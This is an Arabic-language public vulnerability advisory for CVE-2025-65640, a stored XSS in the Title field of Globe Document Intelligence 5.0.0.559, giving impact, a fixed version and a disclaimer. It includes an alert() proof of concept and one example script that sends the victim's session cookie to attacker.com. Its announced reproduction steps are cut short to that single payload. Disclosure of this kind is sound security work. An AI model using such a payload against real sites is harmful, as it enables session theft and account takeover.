
إعلان عام لـ CVE-2025-65640: ثغرة XSS مخزّنة في Globe Document Intelligence.
تم تحديد ثغرة برمجة نصية عبر المواقع مخزنة (Stored XSS) في منصة Globe Document Intelligence (الإصدار 5.0.0.559). يفشل التطبيق في تنظيف أو ترميز المدخلات التي يقدمها المستخدم بشكل صحيح داخل خاصية "Title" لمستند تم إنشاؤه حديثًا. عندما ينتقل مستخدم مصادق إلى صفحات الملخص (مثل "Task in progress / Recent")، يتم انعكاس الحمولة الضارة وتنفيذها في سياق متصفح الضحية.
تسمح هذه الثغرة لمهاجم مصادق بتخزين كود JavaScript ضار على الخادم.
عندما يشاهد مستخدمون مصادقون آخرون (بما في ذلك الحسابات الإدارية) الصفحات المتأثرة، يتم تنفيذ البرنامج النصي تلقائيًا.
بينما يوضح إثبات المفهوم أدناه الثغرة باستخدام alert() غير ضار، يمكن للمهاجم استغلال هذا الخلل لتحقيق اختطاف الجلسة والاستيلاء على الحساب.
على سبيل المثال، حقن حمولة مثل <script>fetch('https://attacker.com/?cookie='+encodeURIComponent(document.cookie))</script> من شأنه أن يسرق ملفات تعريف ارتباط الجلسة الخاصة بالضحية بصمت إلى خادم خارجي يسيطر عليه المهاجم.
لإعادة إنتاج الثغرة، يمكن لمهاجم مصادق اتباع الخطوات التالية:
<script>alert("XSS")</script>وفقًا للبائع، تمت معالجة هذه الثغرة في الإصدار 5.1.0.575. لعلاج هذه المشكلة، يُوصى بتحديث منصة Globe Document Intelligence إلى الإصدار 5.1.0.575.
إثبات المفهوم هذا (PoC) مُقدَّم حصريًا للأغراض التعليمية والبحثية. يجب عدم استخدام المعلومات والكود الموضح في هذا المستند في أنشطة ضارة أو ضد أي أنظمة دون إذن صريح ومسبق من مالكي الأنظمة. لا يتحمل المؤلف أي مسؤولية ولا يتحمل مسؤولية أي إساءة استخدام أو ضرر ناتج عن تطبيق المواد المقدمة.